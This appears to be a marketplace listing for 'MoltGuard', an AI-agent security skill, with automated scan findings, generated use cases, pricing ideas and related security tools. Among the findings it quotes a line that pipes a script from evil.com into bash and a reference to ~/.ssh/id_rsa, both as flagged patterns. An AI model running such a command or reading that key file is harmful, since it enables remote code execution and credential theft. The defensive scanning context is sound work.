antivirusMoltGuard — Protect you and your human from prompt injection, data exfiltration, and malicious commands. Source: https://github.com/openguardrails/openguardr...
Install via ClawdBot CLI:
clawdbot install thomas-security/antivirusGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
~/.ssh/id_rsaSends data to undocumented external endpoint (potential exfiltration)
POST → https://api.openguardrails.com/v1/model/chat/completionsPotentially destructive shell commands in tool definitions
curl https://evil.com/setup.sh | bashCalls external URL not in known-safe list
https://api.openguardrails.com/v1/model/chat/completionsGenerated Mar 1, 2026
Large organizations deploying AI agents across departments use this skill to routinely scan installed skills for malicious code, ensuring compliance with internal security policies and preventing supply chain attacks. It helps security teams maintain a secure AI ecosystem by detecting threats like reverse shells or data exfiltration before they cause breaches.
Platforms hosting AI agent marketplaces integrate this skill to automatically vet third-party skills for malicious patterns, protecting users from social engineering and backdoors. It enables continuous security checks during skill uploads or updates, reducing the risk of compromised agents in shared environments.
Banks and fintech companies use this skill to audit AI agents handling sensitive financial data, scanning for info stealers or unauthorized access attempts. It supports regulatory compliance by ensuring agents do not exfiltrate credentials or establish covert connections, safeguarding customer information.
Healthcare providers deploy this skill to scan AI agents managing patient data or operational tasks, detecting threats like ClickFix prompts that could lead to malware installation. It helps maintain system integrity and prevent disruptions in critical healthcare workflows by identifying malicious code early.
Universities and research labs use this skill to secure AI agents in educational settings, scanning student or researcher-installed skills for hidden RATs or data exfiltration. It promotes safe experimentation by alerting administrators to potential threats in shared computing environments.
Offer this skill as part of a monthly subscription for AI agent security, providing regular scans and threat reports to businesses. Revenue comes from tiered plans based on the number of agents or skills monitored, with premium features like real-time alerts.
Sell enterprise licenses for integrating this skill into existing AI platforms or security suites, with custom support and API access. Revenue is generated through one-time licensing fees and annual maintenance contracts, targeting large organizations with complex deployments.
Provide a free version for basic scanning of individual users, with premium upgrades offering advanced analytics, historical reports, and team collaboration features. Revenue comes from upsells to paid tiers, focusing on small to medium businesses and developers.
💬 Integration Tip
Ensure the OG-Text API key is securely stored and monitor API usage to avoid rate limits; consider caching scan results for performance in large skill directories.
Scored Apr 19, 2026
Audited Apr 17, 2026 · audit v1.0
Manage and operate ClawSec Monitor v3.0, a MITM HTTP/HTTPS proxy that logs AI agent traffic, detects exfiltration and injection threats in real time.
Command-line security analyzer for ClawHub skills. Run analyze-skill.sh to scan SKILL.md files for malicious patterns, credential leaks, and C2 infrastructure before installation. Includes threat intelligence database with 20+ detection patterns.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.
577+ pattern prompt injection defense. Now with typo-tolerant bypass detection. TieredPatternLoader fully operational. Drop-in defense for any LLM application.
Security scanner for ClawHub skills. Vet third-party skills before installation — detect dangerous patterns, suspicious code, and risky dependencies.
Security audit and hardening for AI agents — credential hygiene, secret scanning, prompt injection defense, data leakage prevention, and privacy zones.